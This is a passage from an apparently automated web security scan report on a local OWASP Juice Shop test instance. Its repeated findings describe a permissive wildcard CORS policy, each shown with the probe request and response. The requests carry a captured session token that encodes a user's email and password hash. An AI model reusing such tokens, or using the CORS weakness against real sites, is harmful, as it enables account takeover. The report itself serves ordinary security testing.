The application allowed access from the requested origin http://zbiykclnarvo.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /css/app.css HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://zbiykclnarvo.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"1a5-15942f0cef8"
Content-Type: text/css; charset=UTF-8
Content-Length: 421
Date: Sun, 15 Jan 2017 21:16:09 GMT
Connection: close

.sidebar {
background: #F3F3F3;
bottom: 0;
position: absolute;
top: 0;
}

.page-header-sm {
margin: 10px 0 20px;
}

.right .github-fork-ribbon {
background-color: #333;
}

.rib
...[SNIP]...
2.37. http://192.168.61.143:3000/dist/juice-shop.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /dist/juice-shop.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://ytyqgpzctyns.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /dist/juice-shop.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://ytyqgpzctyns.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
ETag: W/"10e10-15942f5a540"
Content-Type: application/javascript
Content-Length: 69136
Date: Sun, 15 Jan 2017 21:13:11 GMT
Connection: close

angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
...[SNIP]...
2.38. http://192.168.61.143:3000/i18n/en.json
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /i18n/en.json

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://hkbthndpmeas.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /i18n/en.json HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://hkbthndpmeas.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"1159-15942f0cef8"
Content-Type: application/json
Content-Length: 4441
Date: Sun, 15 Jan 2017 21:16:11 GMT
Connection: close

{
"LANGUAGE":"English",
"NAV_SEARCH":"Search",
"SEARCH_PLACEHOLDER": "Search...",
"NAV_COMPLAIN":"Complain?",
"RIBBON_GITHUB_FORK":"{{fork}} me on {{github}}",
"TITLE_LOGIN":"Login",
"MA
...[SNIP]...
2.39. http://192.168.61.143:3000/i18n/en_US.json
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /i18n/en_US.json

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://hzvixubfrunt.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /i18n/en_US.json HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://hzvixubfrunt.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:16:12 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.40. http://192.168.61.143:3000/public/images/JuiceShop_Logo.svg
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/JuiceShop_Logo.svg

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://wfccjohwzeef.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/JuiceShop_Logo.svg HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://wfccjohwzeef.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"9746-15942f0cef8"
Content-Type: image/svg+xml
Content-Length: 38726
Date: Sun, 15 Jan 2017 21:16:29 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 18.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/
...[SNIP]...
2.41. http://192.168.61.143:3000/public/images/products/%7B%7Bproduct.image%7D%7D
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/%7B%7Bproduct.image%7D%7D

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://yljdfiskxduo.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/%7B%7Bproduct.image%7D%7D HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://yljdfiskxduo.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:13:15 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.42. http://192.168.61.143:3000/public/images/products/bower_components/angular-animate/angular-animate.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-animate/angular-animate.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://jqwciyfsybwn.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-animate/angular-animate.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://jqwciyfsybwn.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:16:50 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.43. http://192.168.61.143:3000/public/images/products/bower_components/angular-base64/angular-base64.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-base64/angular-base64.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://izukfgftrsxz.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-base64/angular-base64.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://izukfgftrsxz.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:16:51 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.44. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://fvxstdzlecua.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://fvxstdzlecua.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:02 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.45. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://luszyxfylxyr.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://luszyxfylxyr.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:20 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.46. http://192.168.61.143:3000/public/images/products/bower_components/angular-cookies/angular-cookies.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-cookies/angular-cookies.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://stcoafegahmb.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-cookies/angular-cookies.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://stcoafegahmb.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:23 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.47. http://192.168.61.143:3000/public/images/products/bower_components/angular-qrcode/angular-qrcode.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-qrcode/angular-qrcode.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://wjhgybwzwwmi.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-qrcode/angular-qrcode.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://wjhgybwzwwmi.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:25 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.48. http://192.168.61.143:3000/public/images/products/bower_components/angular-route/angular-route.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-route/angular-route.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://vizstoizpqzw.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

